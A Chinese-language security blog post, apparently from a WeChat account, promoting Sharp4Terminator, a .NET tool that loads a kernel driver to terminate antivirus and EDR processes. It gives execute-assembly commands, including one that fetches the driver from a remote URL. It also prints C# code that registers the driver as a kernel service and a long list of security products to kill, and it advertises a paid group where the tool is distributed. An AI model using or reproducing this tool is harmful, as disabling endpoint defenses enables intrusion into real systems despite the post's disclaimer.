01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4Terminator是一款基于.NET实现的利器,通过加载内核驱动程序来关闭反病毒软件或EDR进程。工具支持远程下载驱动和本地加载两种方式,通过驱动程序关闭常见的反病毒软件和EDR进程。
3
使用方法
Sharp4Terminator使用内核驱动程序关闭反病毒软件和EDR(Endpoint Detection and Response)进程。
3.1 远程下载驱动
通过指定远程URL,Sharp4Terminator将驱动程序下载到C:WindowsTemp目录,并从该位置加载。具体用法如下所示。
execute-assembly Sharp4Terminator.exe --url "http://remoteurl.com:80/Terminator.sys"
3.2 本地加载驱动
通过指定本地磁盘路径,Sharp4Terminator直接加载驱动程序。具体用法如下。
execute-assembly Sharp4Terminator.exe --disk "C:pathtodriverTerminator.sys"
04
核心代码
Sharp4Terminator过调用Windows服务管理API,打开服务控制管理器,创建一个新的服务并加载指定路径的驱动程序。具体代码如下所示。
private static bool LoadDriver(string driverPath)
{
IntPtr hSCM = NativeMethods.OpenSCManager(null, null, NativeMethods.ServiceManagerAccess.SC_MANAGER_ALL_ACCESS);
IntPtr hService = NativeMethods.OpenService(hSCM, "Mert", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS);
hService = NativeMethods.CreateService(
hSCM, "Mert", "MErt", NativeMethods.ServiceAccess.SERVICE_ALL_ACCESS,
NativeMethods.ServiceType.SERVICE_KERNEL_DRIVER,
NativeMethods.ServiceStartType.SERVICE_DEMAND_START,
NativeMethods.ServiceErrorControl.SERVICE_ERROR_IGNORE,
driverPath, null, IntPtr.Zero, null, null, null
);
NativeMethods.CloseServiceHandle(hService);
NativeMethods.CloseServiceHandle(hSCM);
return true;
}
Sharp4Terminator的另一个关键部分是针对EDR和反病毒软件进程的列表。工具通过检测并关闭这些进程来实现其目标。具体代码如下所示。
private static readonly string[] edrList = new string[]
{
"activeconsole", "anti malware", "anti-malware", "antimalware", "anti virus", "anti-virus", "antivirus",
"appsense", "authtap", "avast", "avecto", "canary", "carbonblack", "carbon black", "cb.exe",
"ciscoamp", "cisco amp", "countercept", "countertack", "cramtray", "crssvc", "crowdstrike",
"csagent", "csfalcon", "csshell", "cybereason", "cyclorama", "cylance", "cyoptics", "cyupdate",
"cyvera", "cyserver", "cytray", "darktrace", "defendpoint", "defender", "eectrl", "elastic",
"endgame", "f-secure", "forcepoint", "fireeye", "groundling", "GRRservic", "inspector",
"ivanti", "kaspersky", "lacuna", "logrhythm", "malware", "mandiant", "mcafee", "morphisec",
"msascuil", "msmpeng", "nissrv", "omni", "omniagent", "osquery", "palo alto networks",
"pgeposervice", "pgsystemtray", "privilegeguard", "procwall", "protectorservic", "qradar",
"redcloak", "secureworks", "securityhealthservice", "semlaunchsv", "sentinel", "sepliveupdat",
"sisidsservice", "sisipsservice", "sisipsutil", "smc.exe", "smcgui", "snac64", "sophos",
"splunk", "srtsp", "symantec", "symcorpu", "symefasi", "sysinternal", "sysmon", "tanium",
"tda.exe", "tdawork", "tpython", "vectra", "wincollect", "windowssensor", "wireshark",
"threat", "xagt.exe", "xagtnotif.exe", "mssense"
};
上述列表包含了许多常见的EDR和反病毒软件进程名称。工具通过检测并尝试关闭这些进程,达到绕过防御系统的目的。工具已经打包在星球,感兴趣的朋友可以加入自取。
5
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。
目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价,2024.06月底起 ¥239,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...